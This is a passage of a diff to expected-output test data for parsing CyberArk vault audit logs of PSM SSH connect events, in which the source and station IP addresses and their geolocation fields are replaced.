Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 03:31:56",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm connect",
@@ -795,7 +744,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 24710,
+        "log.offset": 24686,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -805,24 +754,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -850,23 +796,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:33:39Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:39</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:39Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:39</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:39Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 03:33:39",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm connect",
@@ -887,7 +828,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 27706,
+        "log.offset": 27676,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -897,24 +838,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -942,23 +880,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:35:00Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:35:00</Timestamp>\n    <IsoTimestamp>2021-03-15T10:35:00Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:35:00</Timestamp>\n    <IsoTimestamp>2021-03-15T10:35:00Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 03:35:00",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm connect",
@@ -979,7 +912,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 30702,
+        "log.offset": 30666,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -989,24 +922,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -1030,23 +960,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "692fe25f-f940-4170-8ea4-5241b35173f0",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T13:18:31Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:18:31</Timestamp>\n    <IsoTimestamp>2021-03-15T13:18:31Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:18:31</Timestamp>\n    <IsoTimestamp>2021-03-15T13:18:31Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 06:18:31",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm connect",
@@ -1067,7 +992,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 33698,
+        "log.offset": 33656,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -1077,24 +1002,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "adrian"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -1118,23 +1040,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "f5725611-ca57-4a2a-a089-f45b3174a358",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:08:06Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:06</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:06Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:06</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:06Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 07:08:06",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm connect",
@@ -1155,7 +1072,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 36226,
+        "log.offset": 36178,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -1165,24 +1082,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "adrian"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -1214,23 +1128,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "7db90436-8a1a-4203-9a96-65137625ab2d",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:08:28Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:28</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating 